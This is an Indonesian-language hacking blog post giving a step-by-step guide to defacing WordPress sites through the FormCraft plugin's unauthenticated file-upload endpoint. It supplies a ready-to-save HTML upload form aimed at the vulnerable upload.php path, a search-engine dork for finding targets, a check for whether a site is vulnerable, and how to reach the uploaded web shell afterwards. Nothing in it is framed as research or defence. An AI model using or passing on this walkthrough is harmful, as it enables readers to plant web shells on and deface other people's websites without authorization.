Defece Wordpress Formcraft Exploit

Kali ini gua mau share Cara Defece Menggunakan Wordpress Formcraft Exploit
Langsung saja

Bahan-bahan
-Shel
-CSRF

<form method = "POST" action = "http://
Target/wp-content/plugins/
formcraft/file-upload/server/php/
upload.php"enctype = "multipart / form-data">
<input type = "file" name = "files []" /> <button> Upload </ button>
</ form>

(simpan dengan ext.html)

Dork : inurl:/wp-content/plugins/formcraft < kembangin
Exploit : /wp-content/plugins/formcraft/file- upload/server/php/upload.php
kalau sudah di exploit keluar kaya gini "failed": "No files found" atau files [] , itu tandanya target Vuln

kalau sudah keluar kaya gitu , masukan Target ke CSRF tdi , lalu upload shelmu
kalau berhasil nanti akan keluar Angka Random .
Contoh : 9860ab123abcd--blabla.php

untuk Akses Shel : http:// www.site.com/wp-content/plugins/ formcraft/fileupload/server/php/files/nameshellrandom.php

@Kalau masih tidak mengerti , harap berkomentar

CowoKerensTeam

Header Ads

Defece Wordpress Formcraft Exploit

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

Defece Wordpress Formcraft Exploit

Related Posts

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts